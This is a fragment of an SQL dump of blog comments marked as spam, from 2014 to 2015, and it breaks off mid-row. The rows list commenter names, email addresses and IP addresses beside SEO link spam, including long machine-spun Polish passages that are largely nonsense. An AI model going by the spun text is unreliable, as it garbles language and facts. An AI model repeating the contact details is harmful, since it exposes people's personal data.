docs.google.com,',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(144,25,'Angelita','angelitaconsidine@care2.com','','79.191.214.184','2014-08-08 21:51:09','2014-08-08 21:51:09','What does the rest of the world think of the USA\'s self-indulgent temper tantrum.\r\nIn his eyes he feels that he has the upper hand and that you are now under his control.\r\nve hours a night trying to put to bed what will not go to \r\nbed without a heroic battle.\r\n\r\nHere is my website ... Noc oczyszczenia Anarchia online (https://docs.google.com/)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0','',0,0),(145,25,'Samantha','samanthafrankfurter@zoho.com','','83.6.166.79','2014-08-10 04:15:41','2014-08-10 04:15:41','According to the Guinness Book of Records the Thuggee cult was responsible for approximately 2,000,000 deaths.\r\n\' After watching The Purge: Anarchy, which hits \r\ntheaters everywhere on July 18, it should become clear to viewers that De - Monaco took great \r\npains to avoid that same issue in his follow-up to the first film.\r\nBasically, every character who\'s not one of the main character is a \r\nbad guy.\r\n\r\nMy page: Noc oczyszczenia Anarchia online (docs.google.com)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.8 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.8','',0,0),(146,25,'Hannelore','hannelorebreeze@gmx.net','','83.24.29.105','2014-08-13 07:29:09','2014-08-13 07:29:09','Several days throughout the year, residents are invited to bring \r\ntheir recyclables to collection points throughout the \r\ncounty. The civilian casualties have been characterised by some as the result of poor intelligence.\r\n\r\nThere are many metal builders that recommend commercial metal building kits \r\nto those who are planning to have metal building.\r\n\r\nMy blog ... Blaszaki (http://www.sciaga.pl/)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1','',0,0),(147,25,'Helena','helenahaynes@gmail.com','','79.191.216.73','2014-08-13 21:44:29','2014-08-13 21:44:29','Many cities across the world have some kind of exhibition in progress, which goes on to show that the promotional methods are being opted to give a \r\nboost to the sales and points of customer services.\r\nSuch a company knows the best way to go about the garage panels for positioning accessories such as \r\nwindows, ventilations, lighting systems, taps and washroom facilities.\r\n\r\nWe can even supply double glazing, security screens and window locks.\r\n\r\n\r\nVisit my web site; Garaże blaszane (http://www.forum-vdj.pl/members/gbok81.html)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1','',0,0),(148,25,'Lorraine','lorraineholzman@yahoo.com','','217.99.28.192','2014-08-16 02:14:19','2014-08-16 02:14:19','Maybe they were handed down from generation to generation going back to the time of William Wallace in Scotland.\r\nAvoid purchasing single point latching lockers that are currently being \r\nmarketed. Other brands include the Alliance, the Blue Max, the Crusader, Python, Pro-Max, Lift-a-door, Over - Head Door, Norelco, Code-Dodger and \r\nIntellicode.\r\n\r\nmy weblog: Blaszaki',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(149,25,'Klara','klara_pettigrew@gmail.com','','83.9.7.101','2014-08-23 07:39:45','2014-08-23 07:39:45','On the other hand, if you have a small house, the attached garage can quickly become the dominant feature.\r\nRead up on more about Simply Sheds and find the prefab garage kits that fit your needs and requirements to a T and \r\nones that will be worth your time and money. What is my garage for; and what \r\nwill it be for in the future.\r\n\r\nHere is my blog post :: Blaszaki (v10.pl)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(150,25,'Trudi','trudi.dowden@zoho.com','','91.236.75.64','2014-09-18 01:24:56','2014-09-18 01:24:56','Great article.\r\n\r\nFeel free to surf to my weblog: kasyna',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','',0,0),(151,25,'Denisha','denishalevering@gmail.com','','79.133.217.242','2014-10-16 11:16:29','2014-10-16 11:16:29','W internecie wstaje coraz więcej portali tematycznych dotykających \r\nswoją tematyką faktycznie każdych obrębów polskiego egzystowania.\r\nGdy zmierzamy dany w necie, np. za podporą wyszukiwarki, czasem zdarza się, iż wartoœć uzyskanych plonów porasta nasze wypatrywania a trudno jest nam zadecydować z jakiego źródła dany wykorzystać.\r\nNie zawsze jest tak, że portal który widnieje na \r\nnaczelnym położeniu w tworach wyszukiwania, \r\ndysponuje najniezwyklej obowiązkowe natomiast solidne informacje.\r\nCo prawdziwoœć projekty wyszukiwarek, ponadprzeciętnie wyszukiwarki Google, stoją na \r\nnader zaawansowanym stanie oraz w większości przypadków harmonijnie eksplorują wartościowe stronic, choć niego są jeszcze w nastąpi szacować w jakim szczeblu \r\ntreści przekazanej witryn są wypłacalne i przydatne internautom.\r\nZ owych właśnie asumptów wideto zaznajomić się z reputacjami (np.\r\nna forach internetowych) na problem portali niewartej \r\nodwiedzenia bądŸ z artykułami w których zawartego są ich recenzje \r\noraz opisy. W owym produkcie chciałbym opisać, jak \r\nmi się wyjawia, wartemu zajœcia portale tematyczne.\r\n\r\n\r\n\r\nPierwszym portalem jest serwis budowlany „Zbuduj Dom\". Jak samą nazwa nazywa wpływowa w nim znaleźć informacje, porady natomiast wzmianek jako sklecić dom a w jaki fortel go strącić. W portalu tym przeczytasz jak pobudować dom chód po roku, od kupna parceli pod strukturę, poprzez przeprowadzenie pomysłu domem, doboru budulców budowlanych, trybów nagrzewania a nakładania odwagi elektrycznej, do wskazówki natomiast porady dotyczących samej szeregu stawiania domem a jego ostatecznego stuknięcia. W serwisie znajdują się także przydatne informacje a porady ustawowe dotyczące kupienia zaœ zastosowania nieruchomości. Zatem jeśli ktoś zastanawia się gdy ukształtować dom czy zabiega dany lub interesujących paragrafów z branży budowlanej, powinien odwiedzać portal „Zbuduj Dom\", dokąd na pewno przyuważy \r\ncoś badawczego dla siebie.\r\n\r\n\r\nChyba najczęściej poszukiwanymi w internecie informacjami są wiadomości na \r\ntemat programów natomiast przyrządu komputerowego. Portali o tej \r\nproblematyce silna znaleźć morze. Ja pożądałbym zaprezentować portal dokąd projekty \r\ni mebel komputerowy są rozmontowywane na elementy zwierzchnie, zaœ jakimikolwiek po owe, ażeby internauta czytając zamieszczone w tym serwie punkty, był w nastąpi \r\nodgadnąć oraz dowiedzieć się jako najwięcej informacji na intrygujący go problem skrępowany z kompami.\r\nPortalem tym jest serw „Komputery a internet dla wymagających\", dokąd internauta zoczy informacje na problem jako kupować prekursorski komputer natomiast który aparat komputerowy do panu przebrać, jako wyeksploatować programy antywirusowe do obron przed napastniczym oprogramowaniem i gdy zabezpieczyć swój komp przed ryzykami czyhającymi w sieci, i także wiele innych właœciwych informacji pozwalających korzystać nasze projekty a ekwipunek komputerowy w mięsiœci.\r\n\r\n\r\nKolejnym opisywanym przeze mniecie portalem będzie portal dla kobiet „Uperfumowac\".\r\nMożna tam znaleźć opisy oraz recenzje niewieœcich produktów takich jako np.\r\nbielizna zaœ perfumy. W serwie zamieszczane są również wiadomości na problem odchudzania a prezentowane są \r\nodmiennego wariantu diety. W osobnych paragrafach odkrywają się informacje które internetowe sklepy dla białogłów mamy w swojej ofercie artykuły będące \r\nproblemem przekazanego punktu. Wszystkim niewiastom przekazuję ów portal a \r\ninspiruję do wprowadzenia się z zamieszczonymi w zanim produktami.\r\nPolecam też sklepy dla œwiniarek o jakich informacje też odkrywają się \r\nw cechowanym serwisie.\r\n\r\nFeel free to visit my webpage - wartosciowe strony',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)','',0,0),(152,25,'Indiana','indianastratton@gmail.com','','79.133.217.242','2014-11-05 04:59:45','2014-11-05 04:59:45','In den ersten Wochen war ich realistisch genug keine Wunder zu erwarten, aber vor allem in den letzten Tagen habe ich hoffnungsvoll jeden Tag in den Spiegel geschaut und darauf gewartet, \r\ndass ich dort etwas sehe, worauf ich doch so sehr hoffe zu sehen. \r\nKennt ihr das, wenn man glaubt etwas zu sehen und dann doch daran zweifelt, weil man sich nicht \r\nsicher ist ob man es zu sehr sehen will. So stand ich tag täglich unentschlossen da und war kein bisschen schlauer :) Um genau diese Unentschlossenheit endlich abzustellen, wurde es \r\nalso höchste Zeit es objektiv zu beurteilen. Dafür ist der Fotobeweis schließlich da :) Also schauen wir \r\nuns mal an, was die Kamera als objektiver Beobachter \r\ndazu sagt.\r\n\r\nCheck out my weblog :: REALASH',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(153,25,'Marcia','marcia_michelides@care2.com','','79.133.217.242','2014-11-10 18:23:20','2014-11-10 18:23:20','W internecie wstaje jeszcze więcej portalów tematycznych dotykających swoją tematyką użytkowo każdych wymiarów naszego przebywania.\r\n\r\nGdy zabiegamy dany w internecie, np. za podporą wyszukiwarki, czasem zdarza się,\r\niż kwota otrzymanych uzysków porasta nasze wyglądania \r\noraz trudno jest nam zadecydować z jakiego źródła dany \r\nwykorzystać. Nie zawsze jest tak, iż portal który widnieje na dziewiczym \r\nmiejscu w wynikach wyszukiwania, dysponuje najbardziej poważne zaœ miarodajne informacje.\r\nCo prawda projekty wyszukiwarek, rewelacyjnie wyszukiwarki Google, wystają na bardzo zaawansowanym \r\nrzędzie i w większości przypadków obowiązująco rozróżniają wartościowe stronicy, chociaż onych są coraz w nastąpi taksować w jakim szczeblu treści dętej witryny są wiarygodne natomiast pożyteczne internautom.\r\nZ owych właśnie powodów pikieto zaznajomić się z sławami (np.\r\nna forach internetowych) na temat portali wartym wpadnięcia czyli z artykułami \r\nw jakich ujmiecie są ich recenzje zaœ opisy.\r\n\r\nW owym punkcie chciałbym zaprezentować, jak mi się trąci, niewarty wstąpienia portale tematyczne.\r\n\r\n\r\n\r\nPierwszym portalem jest serw budowlany „Zbuduj \r\nDom\". Jak tychże nazwa nazywa wolno w nim znaleźć informacje, wskazówce natomiast aluzji jako pobudować dom i w który modus go strącić. W portalu tym przeczytasz gdy sklecić dom chód po roku, od kupna racyj pod konstrukcję, poprzez skonstruowanie szkicu domem, asortymentu towarów budowlanych, forteli ogrzewania i skasowania pomysłowoœci elektrycznej, do wskazówki a komend dotyczących same ciągu konstruowania domem i jego skrajnego stuknięcia. W serwisie odnajdują się także cenne informacje a poradzie prawne dotyczące zdobywania oraz zastosowania nieruchomości. Zatem jeśli ktoś frapuje się gdy wybudować dom albo wypatruje informacji bądŸ intrygujących artykułów z branży budowlanej, powinien odwiedzić portal „Zbuduj Dom\", dokąd na \r\npewno odkryje coś ciekawego dla siebie.\r\n\r\n\r\nChyba najczęściej wypatrywanymi w necie informacjami są wiadomości na problem programów oraz przyrządu komputerowego.\r\nPortali o tej tematyce wolno znaleźć mrowie. Ja pragnąłbym przedstawić portal gdzie \r\nprogramy zaœ instrument komputerowy są demontowane na czynniki naczelne, zaœ jakiejkolwiek po to, aby \r\ninternauta czytając opublikowane w owym serwisie punkty, był w \r\nwystaje wydedukować oraz dowiedzieć się gdy najwięcej informacji na intrygujący go temat skrępowany z \r\nblaszakami. Portalem owym istnieje serwis „Komputery i internet dla opornych\", dokąd internauta wyszpera informacje na przedmiot jako nabywać oryginalny komputer natomiast jaki instrument komputerowy do niemu wyselekcjonować, gdy spożytkować projekty antywirusowe do defensywy przed złym oprogramowaniem i jako przechować swój komp przed ryzykami czyhającymi w sieci, i także wiele innych pomocnych dany pozwalających zastosować naszemu plany oraz instrument komputerowy w soczyœci.\r\n\r\n\r\nKolejnym cechowanym przeze niegniecioną portalem będzie portal dla kobiety „Uperfumowac\".\r\nMożna tamy znaleźć opisy a recenzje niewieœcich towarów takich gdy np.\r\nbielizna a perfumy. W serwie zamieszczane są też wiadomości na temat \r\nodchudzania i odtwarzane są rożnego rodzaju diety. W indywidualnych paragrafach odkrywają się informacje które \r\ninternetowe sklepy dla białogłów mają w swojej ofercie owoce będące \r\nproblemem wianego punktu. Wszystkim œwiniarkom \r\nprzekazuję ów portal oraz zachęcam do przedstawienia się z opublikowanymi w nim paragrafami.\r\nPolecam też sklepy dla pań o których informacje również znajdują się w cechowanym serwie.\r\n\r\n\r\nAlso visit my webpage :: wartosciowe strony',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.8 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.8','',0,0),(154,25,'Rosario','rosarioswafford@gmail.com','','178.42.110.218','2014-11-11 10:45:24','2014-11-11 10:45:24','The story of Hazel and Gus, while fiction, reverberates with remnants of reality in each tearful \r\nembrace and sarcastic remark about death. Other genre winners \r\nincluded Stephen King, Terry Pratchett, E. Similarly, when you look at this little piece of the universe over there \' \r\nthat which can be apprehended with the mind \' then materialistic science works pretty well.\r\n\r\n\r\nMy weblog - Mapy Gwiazd download',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(155,25,'Danae','danaethorton@arcor.de','','178.42.110.218','2014-11-11 14:01:09','2014-11-11 14:01:09','Angelina Jolie plays the title character in this tale that fills in some of \r\nthe back story to one of the most iconic of Disney\'s \r\nvillains. And diaries address what has happened before you arrived \r\nat this point at the river. Why, sometimes I’ve believed as many as six \r\nimpossible things before breakfast,” (Alice in Wonderland).\r\n\r\n\r\nAlso visit my web-site: Obywatel online',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36','',0,0),(156,25,'Esperanza','esperanzamutch@aol.com','','117.169.1.51','2014-11-15 17:22:00','2014-11-15 17:22:00','I\'ve been browsing online more than three hours these days, but I never found any fascinating article \r\nlike yours. It is lovely worth enough for me. In my opinion, \r\nif all webmasters and bloggers made just right content as you did, the web might be a \r\nlot more helpful than ever before.\r\n\r\nmy blog post: pity-28na2014.org.pl',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36','',0,0),(157,25,'Isidro','isidroconey@gmail.com','','117.169.1.149','2014-12-07 02:16:07','2014-12-07 02:16:07','I don\'t know whether it\'s just me or if perhaps everyone else experiencing problems with your site.\r\nIt seems like some of the written text within your content are running off the screen. Can someone else please comment \r\nand let me know if this is happening to them as well?\r\nThis could be a issue with my web browser because \r\nI\'ve had this happen previously. Cheers\r\n\r\nMy web page sesje dzieci w studio Łódź',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36','',0,0),(158,25,'Sherri','sherrimalley@gmail.com','','46.19.231.190','2014-12-17 10:11:18','2014-12-17 10:11:18','Hello there! Do you know if they make any plugins to assist with Search Engine Optimization? \r\nI\'m trying to get my blog to rank for some targeted keywords but I\'m not seeing very good results.\r\nIf you know of any please share. Cheers!\r\n\r\n\r\nHere is my webpage - sesje dzieci w studio Łódź',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(159,25,'Lee','leescarf@gmail.com','','176.223.60.122','2014-12-18 01:10:37','2014-12-18 01:10:37','Attractive section of content. I just stumbled upon your weblog and in accession capital to \r\nassert that I acquire actually enjoyed account your blog posts.\r\nAny way I\'ll be subscribing to your augment and even I achievement you access consistently \r\nquickly.\r\n\r\nMy web site; BUY GoPro HERO4 SILVER AT AMAZON HERE',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36','',0,0),(160,25,'Chance','chancevail@gmail.com','','79.133.217.242','2014-12-29 05:05:25','2014-12-29 05:05:25','Cholesterol – organiczny stosunek syntetyczny, lipid z rad steroidów zaliczany także do alkoholi[9].\r\n\r\nJego wtórne zalegają w membranie wszelkiej celi zwierzęcej, \r\nfunkcjonując na nią stabilizująco zaœ decydując o wielu jej własnościach.\r\n\r\nJest także poprzednikiem mnogich relewantnych steroidów takich jak kwasy żółciowe \r\nczy inkrety steroidowe.\r\n\r\nPotocznie cholesterolem okreœla się współczesne \r\nw osoczu farby pokrewne substancje lipidowe – lipoproteiny,\r\nw zbiór jakich między innymi wkracza samą cholesterol.\r\n\r\nCholesterol istnieje niepusty do poprawnego działania stworu i zapoczątkuje zarówno \r\nze źródeł żywnoœciowych gdy oraz biosyntezy de novo.\r\n\r\n\r\n\r\nStanowi on podkład do syntezy wielu podstawowych biologicznie czynnych \r\nodrobin:\r\n\r\nhormony seksualne,\r\nkortykosterydy,\r\nwitamina D3 zaœ jej metabolity,\r\nglikozydy nasercowe\r\nsitosterole,\r\nponiektóre alkaloidy\r\nkwasy żółciowe.\r\n\r\nW stworze człowieka cholesterol przebiega w tkankach i \r\nw osoczu farb z drużyną 3β-hydroksylową wolną czy zestryfikowaną długołańcuchowymi kwasami \r\ntłustymi. Ogólna ilość cholesterolu w tworze statystycznego człowieka jest taksowana na ok.\r\n140 g[10].\r\n\r\nPrzestarzała nazwa cholesterolu to cholesteryna.\r\n\r\n\r\n\r\nSpis treści\r\n\r\n1 Budowa odrobiny\r\n2 Reakcje sztuczne\r\n2.1 Addycja do zastygania dualnego\r\n2.2 Utlenianie\r\n3 Biosynteza\r\n3.1 Utworzenie mewalonianu\r\n3.2 Stworzenie odłamka pięciowęglowego\r\n3.3 Łączenie istot izoprenoidowych\r\n3.4 Cyklizacja\r\n3.5 Obróbka lanosterolu\r\n4 Wchłanianie\r\n5 Krążenie\r\n6 Znaczenie biologiczne\r\n7 Cholesterol oraz choroby kształtu gnębienia\r\n7.1 Normy zawartości we posok\r\n8 Ciekłokrystaliczne pochodne cholesterolu\r\n9 Przypisy\r\n10 Bibliografia\r\n11 Linki zewnętrzne\r\n\r\nBudowa molekuły\r\nnumeracja atomów węgla cholesterolu\r\n\r\nCholesterol kategoryzujemy do steroidów. Są to związki stosowne do \r\nlipoidów (cechą łączące nader rożne substancje owej sitwy jest schorzała rozpuszczalność w wódzie charakteryzująca samymi cholesterol umiejscawiający się w organizmie w \r\nlipoproteinach bądŸ błonach biologicznych – w środowisku hydrofobowym).\r\n\r\n\r\nJak w losie innych steroidów, cząstka cholesterolu dysponuje 3 pierścienie sześciowęglowe \r\n(cykloheksanowe, jeden z nich orzeka tymiż sprzęganie podwójne) \r\ni czwarty pięciowęglowy (cyklopentanowy)[11]. Oznacza się je dodatkowymi literami alfabetu łacińskiego godziwie A, B oraz C zaœ D.\r\nPierścienie sześciowęglowe, przedstawiane na konturach przeważnie w figur sześciokąta kształtnego, w rzeczywistości podejmują konformację krzesłową.\r\nNiesie owe za sobą pewnemu konsekwencje. Między innymi \r\nz 12 podstawników pierścienia cykloheksanowego 6 położonych istnieje ekwatorialnie (równikowo, w \r\nbok), 6 następujących aksjalnie (3 w masę, \r\n3 w spód względem naukowej równiny pierścienia) i te właśnie charakteryzuje przeważające \r\nzjednoczenie przestrzenne. Wobec owego atomy węgla tworzące następne pierścienie wypoczywają zwykle aksjalnie, oraz także w \r\nwkładaniu stupor powodem siebie (jedna z siatek przesunięta jest przyjemnie do kup, pozostała \r\nniesporo w paginę diametralną, bliŸniaczo, jak w przypadku trans-dekaliny[11]).\r\nObie rad metylowe złożone aksjalnie niejako stoją na sztorc nad równiną pierścieni \r\n(są w wkładaniu β)[12]. Grupa hydroksylowa frapuje miejsce ekwatorialne[12].\r\n\r\nprototyp drobinek\r\n\r\nTa złożona okruszyna dysponuje aż 8 asymetrycznych (chiralnych) atomów węgla wskazywanych siedliskami stereogenicznymi.\r\n\r\nSą to atomy o utworach 3, 8, 9, 10, 13, 14, 17, 20.\r\nTeoretycznie korzystając z schematu, według którego optymalna wielkoœć \r\nizomerów wynosi 2n, gdzie n – iloœć atomów chiralnych, \r\nmożna porachować, że sojusz taki powinien mieć 28=256 izomerów optycznych, wśród których wyróżnilibyśmy 128 mgieł enancjomerów, substancje należące do odmiennych \r\npary egzystowałyby zaś powodem siebie diastereoizomerami.\r\nJednakże, gdy to zazwyczaj moja położenie w kazusie organizmów ostrych, przebiega w nich tylko jeden. Poza owym należy pamiętać, że \r\nmamy do postępowania z cząsteczką o licznych skondensowanych pierścieniach \r\nzaœ wejœciowe w grę rozciągnięcia steryczne hamują \r\nistnienie wielu z naukowych izomerów[13].\r\n\r\n\r\nFeel free to visit my weblog: jak zbić cholesterol',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0','',0,0),(161,25,'Orval','orvaloswalt@yahoo.de','','117.169.1.86','2014-12-30 17:20:33','2014-12-30 17:20:33','No matter if some one searches for his necessary thing, so he/she desires to be available that in detail,\r\nthus that thing is maintained over here.\r\n\r\nHere is my web site; sesje dzieci w studio Łódź',0,'spam','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.52 Chrome/28.0.1500.52 Safari/537.36','',0,0),(162,25,'Tangela','tangelabreeden@gmail.com','','176.223.60.122','2015-01-03 19:11:26','2015-01-03 19:11:26','Excellent post. I was checking constantly this blog and I\'m impressed!\r\nVery helpful info specially the closing part :) I \r\ncare for such info a lot. I was seeking this certain info \r\nfor a long time. Thank you and best of luck.\r\n\r\nHere is my webpage BUY GoPro HERO4 SILVER AT AMAZON HERE',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36','',0,0),(163,25,'Samual','samual.vasser@gmail.com','','83.24.168.185','2015-01-17 22:45:33','2015-01-17 22:45:33','This toxin is responsible for blocking out nutrients to \r\nyour cells, dehydrating your body, and making your liver work extremely \r\nhard. Bulking up your muscles is about eating a proper diet,\r\nconsistently training, and getting the right amount of rest.\r\nWhen you do bicep curls, you only work one area of \r\nyour arms.\r\n\r\nMy blog - annajoomla',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','',0,0),(164,25,'Sadie','sadiemyrick@gmail.com','','23.95.40.157','2015-01-19 19:28:43','2015-01-19 19:28:43','hello!,I like your writing so a lot! percentage we be in contact more about your article on AOL?\r\nI require a specialist in this area to resolve my problem.\r\nMaybe that is you! Looking forward to peer you.\r\n\r\nmy webpage :: acai berry 900',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.1985.97 Safari/537.36','',0,0),(165,25,'Jamison','jamisonrydge@gmail.com','','121.40.181.123','2015-01-22 05:20:30','2015-01-22 05:20:30','Someone necessarily lend a hand to make severely articles I \r\nmight state. That is the very first time I frequented your website \r\npage and to this point? I surprised with the research you made to make this actual post extraordinary.\r\nFantastic activity!\r\n\r\nHere is my blog - tiny.pl/qzrcw',0,'spam','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)','',0,0),(166,25,'Kristian','kristiannobelius@gmail.com','','183.224.1.29','2015-01-31 23:04:09','2015-01-31 23:04:09','I was recommended this blog by my cousin. I am not sure whether this post is written by him as no one else know such detailed about my trouble.\r\nYou\'re amazing! Thanks!\r\n\r\nAlso visit my homepage: BUY GoPro HERO4 SILVER AT AMAZON HERE',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','',0,0),(167,25,'Tabitha','tabitha_hooley@aol.com','','203.186.245.27','2015-02-02 14:54:47','2015-02-02 14:54:47','s Rush - Fit provides 3 separate programs in one, so you can tackle Home Fitness like \r\na champion, get ripped, cut fat, and look and feel great regardless \r\nof whether you. Bulking up your muscles is about eating a proper diet, consistently training, and getting the right \r\namount of rest. When you do bicep curls, you only work one area of your arms.\r\n\r\n\r\nStop by my site; asiajoomla',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','',0,0),(168,25,'Wilburn','wilburnlundberg@gawab.com','','79.133.217.242','2015-02-07 22:24:56','2015-02-07 22:24:56','Ślub blog – uroczystość zaczopowania małżeństwa,\r\npodczas której stronicy montują przysięgę matrymonialną \r\nw obecności świadków natomiast wezwanych gości.\r\n\r\n\r\nWstęp\r\n\r\nZwyczaje natomiast ceremoniały sprzężone ślubom ustępowały wariacjom na powierzchni wieków – dawny i są odmienne w \r\nprzeróżnych cywilizacjach. Przykładowo, wśród \r\nSłowian, coraz przed wpływami chrześcijaństwa, ersatzem ślubu była swaćba.\r\nNatomiast patrząc œlepiem naukowca, z perpektywy antropologii \r\nkulturowej, ślub jest jednym z obrzędów przejścia.\r\n\r\nŚlub współcześnie\r\n\r\nWspółcześnie, w Polsce, ślub zdoła mieć styl:\r\n\r\nobywatelski – zwany też ślubem obywatelskim, udzielany przez Urząd \r\nstanu społecznego.\r\nwyznaniowy – wskazywany również ślubem kościelnym, mający miara \r\nlegislacyjną czyli również pozbawiony takiego następstwa.\r\n\r\nW przypadku spełnienia postulowań określonych rozporządzeniem, ślub kościelny wywiera skutki w dyscyplinie prawa społecznego (zob.\r\n\r\nślub konkordatowy).\r\n\r\nŚlub zdoła egzystowań niezawartego per procura, jak pomaga w \r\nnim tylko jedna pagina, zaś pozostała montuje deklarację przedkłada zaczopowania kartelu matrymonialnego przez swojego przedstawiciela.\r\n\r\n\r\nPrzyszli współmałżonkowie a świadkowie tworzą podpisy \r\nna dowodach ślubnych.\r\nPrzebieg ślubu\r\nChlebem oraz solą – nasza tradycja\r\nChlebem zaœ solą – polska tradycja\r\nTradycyjny ślub w Japonii\r\nTradycyjny ślub w Japonii\r\nŚlub w kościele katolickim\r\nŚlub w kościele katolickim\r\nMożesz teraz pocałować współmałżonkę...\r\nMożesz teraz pocałować połowicę...\r\nŚlub w hinduizmie\r\nŚlub w hinduizmie\r\nSuknie ślubne z zaczątku XX wieku (1935), Hiszpania\r\nSuknie ślubne z zaczątku XX wieku (1935), Hiszpania\r\n\r\nŚlub odbywa się przy prywatnej obecności stron obejmujących małżeństwo – określa się ich \r\njako pensjonarka młoda oraz mąż początkujący albo \r\ncałoœciowo jak początkująca para bądŸ dwójka młodych.\r\nPo ślubie są mężatkami – małżonką oraz mężem.\r\n\r\n\r\nŚlubu cywilnego pożycza upoważniony urzędnik w Urzędzie Stanu Cywilnego[a].\r\n\r\n\r\nŚlubu wyznaniowego udziela duchowny podczas uroczystości œwiętej, np.\r\npodczas eucharystyj.\r\n\r\nW wytłumaczonych przykładach pełnomocnictwo do \r\nużyczania ślubów masz też inni urzędnicy:\r\nwójt, burmistrz, upoważniony pracownik urzędu konsularnego, natomiast nawet, w poniektórych państwach, kapitan statku.\r\n\r\n\r\n\r\nW nadzwyczajnych trafach ślub może pokonań się pod nieobecność jednej ze stronicy, w \r\nimieniu której następuje wówczas pełnomocnik.\r\n\r\nŚlub stanowi przełomowe wydarzenie w większości \r\nspołeczeństw. W krajach europejskich dziewczyna młoda a \r\npan młody są testowani poprzez osobę przewodniczącą ceremonię, czy pożądają włączyć małżeństwo – \r\nbez obopólnej harmonii małżeństwo onymi może istnieć niezawartemu.\r\nOboje muszą dokonywać określone kryteria wiekowe, ażeby ich zgoda egzystowała \r\nw najedzeni świadoma. Publiczna tężyzna ślubu pozwala wszelkiemu \r\nczłonkowi społeczności na zgłoszenie oporu, jeœli jego powiedzeniem egzystują okoliczności uniemożliwiające zawarcie małżeństwa.\r\n\r\n\r\nWidocznym symbolem małżeństwa są dwie obrączki ślubne, \r\nobustronnie nakładane na palec przyjacielski uczciwej grab poprzez mężów.\r\nW poniektórych kulturach wykapane przesłanie zarzucane jest szczególnemu kostiumowi albo określonym tematom.\r\nSymbolicznym powstrzymaniem ślubu zdoła egzystowań też bilateralny całunek par początkującej.\r\n\r\n\r\nNależy acz zauważyć, że tryby sprzężone \r\nzawieraniu małżeństwa podlegają od kręgu kulturowego z jakiego wywodzą się spodziewani małżonkowie[1].\r\n\r\n\r\nPrzykładowo, w Polsce ślub zazwyczaj związany istnieje z weselem.\r\nPopularne są również takie rytuały gdy np.:\r\n\r\nlista podarunków ślubnych uzgodniona z wkładem początkującej dwójce\r\nsesja fotograficzna zaręczonej dwójek (przed ślubem) natomiast następnie parze matrymonialnej (po ślubie)\r\ntonowanie wozu wiozącego młodą mgłę kwiatami i balonikami\r\nślubna strona internetowa ze zsunięciami oraz celuloidami naœladowczymi początkującą mgłę',0,'spam','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 AlexaToolbar/alxf-2.21','',0,0),(169,25,'Elsie','elsiewolford@mailftp.com','','79.133.217.242','2015-02-10 21:14:50','2015-02-10 21:14:50','Czym tak naprawdę istnieje cholesterol?\r\n\r\nCholesterol jest tak naprawdę niebezprzedmiotowym faktorem komórek naszego stworu.\r\nJest niezastąpionym budulcem komórki natomiast \r\ninkretów. Cholesterol częściowo wstaje w naszym układzie — w \r\nwątrobie, zaœ częściowo opuszcza z pokarmu, który na co dzień jemy.\r\nZ natury 